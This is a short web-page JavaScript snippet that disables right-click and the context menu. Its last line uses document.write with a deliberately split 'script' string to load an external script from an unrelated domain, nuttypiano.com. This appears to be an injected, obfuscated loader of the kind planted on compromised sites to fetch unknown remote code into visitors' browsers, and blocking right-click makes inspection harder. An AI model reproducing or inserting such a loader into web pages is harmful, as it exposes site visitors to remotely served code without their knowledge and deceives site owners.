function click() {
if (event.button==2||event.button==3) {
 oncontextmenu='return false';
  }
}
document.onmousedown=click
document.oncontextmenu = new Function("return false;")


function LimpaBarra(msgStatus) 
{ 
  status.msgStatus 
  document.RetornaValor = true ; 
} 






document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/RADCAB.js"></scri'+'pt>');